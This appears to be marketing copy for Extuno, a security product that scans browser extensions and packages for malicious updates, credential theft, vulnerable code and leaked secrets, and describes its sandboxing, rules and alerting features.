Detection you can see.
Every extension and package gets the full battery - vulnerability and secret-leak testing, static and dynamic analysis, and AI code analysis - in one evidence format that names the file, the change, why it is dangerous, and what to do next.
npm package
The update-channel attack, caught.
Extuno compares each update against the version before it and flags band escalation - the moment a clean release turns malicious.
- + New exfiltration channels introduced on update
- + Added permissions and weakened content policy
- + New remote-code paths that evade review
Update lineage
Run it before it runs on you.
Extuno executes the real extension or package in an ephemeral, network-segmented micro-VM and records exactly what it does.
- + Network endpoints and outbound payloads
- + Credential, session, and wallet theft
- + Crypto-miners and covert command traffic
1100+ rules, one verdict.
Capability abuse, remote-code, credential theft, evasion, surveillance, covert command traffic, and obfuscation - scored into a single, defensible verdict.
- + Severity-banded: clean, review, critical
- + Every rule maps to a concrete finding
- + Verdict you can take to a change board
Known-vulnerable code, surfaced.
Beyond malicious intent, Extuno tests every extension and package for vulnerable code paths, unsafe APIs, and risky dependencies - so a benign-but-exploitable release does not slip through.
- + Unsafe API and injection-prone patterns
- + Vulnerable and outdated dependencies
- + Every finding mapped to its location and fix
The full source, read and correlated.
An analysis layer reads the complete source of every version and ties the static and dynamic results together - clustering related findings, flagging anomalies against a package's own history, and matching known-malware behavior.
- + Reads the full source code of every version
- + Anomaly flags against prior versions
- + Known-malware similarity and campaign clustering
- + Every flag links back to its evidence
A pass/fail check on every pull request.
1000+ anchored secret detectors test extensions, packages, and your own repos for leaked keys, tokens, and credentials - with standard scan output, git-history scanning, and baseline support.
- + Standard SARIF output for code scanning
- + Git-history and baseline support
- + GitHub and GitLab pipelines
Set it once. Re-checked on every release.
Add extensions and packages to a watchlist and route findings to the channels your team already uses.
Watchlist
Track any extension or package across all twelve ecosystems.
Alert lifecycle
Open, acknowledge, and resolve - with a full audit trail.
Delivery
SIEM, Slack, Teams, PagerDuty, email, and signed webhooks.